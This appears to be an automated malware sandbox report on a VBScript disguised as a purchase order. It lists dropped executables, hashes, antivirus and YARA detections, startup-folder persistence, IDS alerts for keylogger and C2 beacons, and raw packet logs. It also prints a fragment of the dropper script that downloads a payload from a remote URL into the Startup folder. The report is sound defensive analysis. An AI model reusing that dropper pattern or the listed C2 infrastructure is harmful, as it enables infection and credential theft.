                                                                                                                            SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                            Malicious:false
                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):919552
                                                                                                                            Entropy (8bit):7.870873923201665
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:3hloDX0XOf4tHzneKlVLaqueI0psAzrcP39:3hloJfaelV6skAf
                                                                                                                            MD5:66A4951D384B55633AB61ADD85514F07
                                                                                                                            SHA1:BBF7A65A664BB2B8001576BF670A8381AAD3A185
                                                                                                                            SHA-256:6068B17CF1C362BFE7736E0B192C362735A040A68A6D41EB8CCDD8BE242CA191
                                                                                                                            SHA-512:D4DC27627BAA28E79AE6DBD375A08C2AFB5D47F43DD1C15E41A5033AC3C95BAD018EBE5087DAFAD62FE2266FA7B69599EC2BED92DA521208AAB5011F854C7123
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....>rg.........."......P...........0.......@....@.......................................@...@.......@.....................0...$....@..0...................T........................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:47:50 2024, mtime=Mon Dec 30 09:47:50 2024, atime=Mon Dec 30 09:47:50 2024, length=919552, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1805
                                                                                                                            Entropy (8bit):3.4221453855087707
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8dC2Cc+MneetCGOA96ArE2+s9T4Ilob3Bm:8dC2CInumVbr9MIl+
                                                                                                                            MD5:ADE9FE5ACF54E2A2C59E3874A95F474C
                                                                                                                            SHA1:5CCD7B714A34BA6819DC28FEED6114C826E3B14A
                                                                                                                            SHA-256:A7573FCA3FB572AC95DC301DADF14531F4343532433A99154637B77661763D3E
                                                                                                                            SHA-512:1D4AE4AEDC55F3C2774315D75CD1C83AF2C6C660D2A632F4E2A9A4470A404D89BF23A213E3919C797E3A3EB502DA1ADE6A6D40E8DABE9877BB7C070668C4606B
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. .....wE.Z..7:zE.Z..7:zE.Z............................:..DG..Yr?.D..U..k0.&...&......vk.v.....5<5.Z..._.E.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.U...........................%..A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......CW.^.Y.U..........................A.y.R.o.a.m.i.n.g.....V.1......Y.U..Windata.@......Y.U.Y.U..........................eu%.W.i.n.d.a.t.a.....`.2......Y.U .DELPQB.exe..F......Y.U.Y.U..............................D.E.L.P.Q.B...e.x.e.......`...............-......._..............=.....C:\Users\user\AppData\Roaming\Windata\DELPQB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.D.E.L.P.Q.B...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1691136
                                                                                                                            Entropy (8bit):7.465728800629642
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
                                                                                                                            MD5:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                            SHA1:2063F45E9C82553BBC41CB4BC8E10B2D06D701C9
                                                                                                                            SHA-256:67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
                                                                                                                            SHA-512:88475B49D4299519B978711B16E0EA40579A3B671EB898D3D3F8391FBC2DE55665BC0A978A20578A4C83F6BF3894A857E4013F34B0E2E4DB6DE404F66EF9CE47
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@..............................B*......0%...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0%.......&..................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Roaming\Windata\DELPQB.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):919552
                                                                                                                            Entropy (8bit):7.870873923201665
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:3hloDX0XOf4tHzneKlVLaqueI0psAzrcP39:3hloJfaelV6skAf
                                                                                                                            MD5:66A4951D384B55633AB61ADD85514F07
                                                                                                                            SHA1:BBF7A65A664BB2B8001576BF670A8381AAD3A185
                                                                                                                            SHA-256:6068B17CF1C362BFE7736E0B192C362735A040A68A6D41EB8CCDD8BE242CA191
                                                                                                                            SHA-512:D4DC27627BAA28E79AE6DBD375A08C2AFB5D47F43DD1C15E41A5033AC3C95BAD018EBE5087DAFAD62FE2266FA7B69599EC2BED92DA521208AAB5011F854C7123
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....>rg.........."......P...........0.......@....@.......................................@...@.......@.....................0...$....@..0...................T........................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                            C:\Users\user\Documents\DVWHKMNFNN\WUTJSCBCFX.xlsm

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18387
                                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                            C:\Users\user\Documents\DVWHKMNFNN\~$WUTJSCBCFX.xlsx

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                            MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                            SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                            SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                            SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                            Malicious:false
                                                                                                                            Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                            C:\Users\user\Documents\DVWHKMNFNN\~$cache1

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):771584
                                                                                                                            Entropy (8bit):6.632118854531729
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                            MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                            SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                            SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                            SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1835008
                                                                                                                            Entropy (8bit):4.465621181587391
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:UIXfpi67eLPU9skLmb0b4jWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:pXD94jWlLZMM6YFHf+8
                                                                                                                            MD5:C3E894B7BF3CB0232ABF33146BA1F962
                                                                                                                            SHA1:640A2796E26B96E3A4EC00DC49D56FFF67B3CBE8
                                                                                                                            SHA-256:C078F4B91C5F03899451AF79451582D624876B87278B81C8DE1C43CA5E1643A7
                                                                                                                            SHA-512:90A425AB9582DAD512C5F68138DDBA0045E9543FE35D8F65ABE722B7562441672C9792E215BF5D05FC4C0F84C46DC32C8D491C5A707C3512ACCC973749C64A01
                                                                                                                            Malicious:false
                                                                                                                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmro.m.Z..............................................................................................................................................................................................................................................................................................................................................|..Y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                            Entropy (8bit):5.501836170240931
                                                                                                                            TrID:
                                                                                                                              File name:Purchase Order Summary Details.vbs
                                                                                                                              File size:664 bytes
                                                                                                                              MD5:f86e6209572e4aa47973b354ce16342f
                                                                                                                              SHA1:651a612eb8b23c243341710deafe8b8032aabf09
                                                                                                                              SHA256:b5dcbbec05c4132e2221ee1be9a68d1ef4b0772a8568eab50f52ecbccca2c30d
                                                                                                                              SHA512:f66d205ab4f9db97bc51aecff2e05f07701bcb5b63c15702362eb526328461306ef166c8339d571124a0a744ad9f8b24fc0f60872f8832a4ed57df92559957b7
                                                                                                                              SSDEEP:12:q7/ohDUpAbs1vWdEV7wsGaMG1oBHSDR0PLAdLJsrfb/oVmlms++N1NapkewLHJ5s:XNvbs1Aw1MG1UHSD8k2rDJPcppwLvxL+
                                                                                                                              TLSH:5D01235AD850C45A0E7C22B046F3258CF9E3D0C4F3B19B1087A1D49FCD9417E8C08587
                                                                                                                              File Content Preview:'<<< Coded By Mr.3amo>>> ..Set VQCPEVMM = CreateObject("WScript.Shell")..xhNetKoI = VQCPEVMM.SpecialFolders("Startup") & "\update.exe"..'<<<<<<<<<<< code start >>>>>>>>>>>..On Error Resume Next..wscript.sleep 3000..call juGzrOcz("https://raw.githubusercon

                                                                                                                              File Icon

                                                                                                                              Icon Hash:68d69b8f86ab9a86

                                                                                                                              Network Behavior

                                                                                                                              Suricata IDS Alerts

                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450304172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449754172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449848172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449911172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450308172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450010172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449800172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450309172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450277172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450207172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:47:34.387955+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450099172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:01.491903+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449744142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:01.546642+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449743142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:01.945046+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44974769.42.215.25280TCP
                                                                                                                              2024-12-30T11:48:01.977556+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.449754172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:01.977556+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449754172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:02.489318+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449749142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:02.553422+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449752142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:03.503871+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449755142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:03.616629+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449757142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:04.642336+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449760142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:04.767565+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449762142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:06.298652+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449772142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:06.302375+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449771142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:07.281227+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449776142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:07.370368+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449778142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:08.352149+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449779142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:08.371820+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449781142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:09.381098+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449784142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:09.394753+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449785142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:10.952210+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449794142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:10.953008+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449795142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:11.060537+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449800172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:11.939764+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449797142.250.185.78443TCP
                                                                                                                              2024-12-30T11:48:20.144056+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449848172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:29.192491+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449911172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:38.269200+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.450010172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:38.269200+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450010172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:47.316580+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450099172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:48:56.378243+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450207172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:49:05.472424+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450277172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:49:14.488094+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.450304172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:49:14.488094+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450304172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:49:30.675751+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450308172.111.138.1005552TCP
                                                                                                                              2024-12-30T11:49:39.770026+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.450309172.111.138.1005552TCP

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 30, 2024 11:47:34.910676956 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:34.910732985 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:34.910818100 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:34.919935942 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:34.919986963 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.357167006 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.357347965 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.412404060 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.412426949 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.412754059 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.412830114 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.415247917 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.459333897 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.663603067 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.663700104 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664207935 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664258957 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664278984 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664288044 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664304972 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664366961 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664395094 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664473057 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664486885 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664535046 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664881945 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664931059 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.664933920 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.664947033 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.665000916 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.665002108 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.665019989 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.665090084 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.668905020 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.668998003 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.669008017 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.669110060 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.678355932 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.678452969 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.746706963 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.746768951 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.746910095 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.746933937 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.746988058 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747011900 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747023106 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747060061 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747198105 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747262955 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747319937 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747325897 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747349024 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747365952 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747709990 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747756958 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747783899 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747801065 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747801065 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747807980 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747823000 CET44349730185.199.108.133192.168.2.4
                                                                                                                              Dec 30, 2024 11:47:35.747863054 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747863054 CET49730443192.168.2.4185.199.108.133
                                                                                                                              Dec 30, 2024 11:47:35.747863054 CET49730443192.168.2.4185.199.108.133
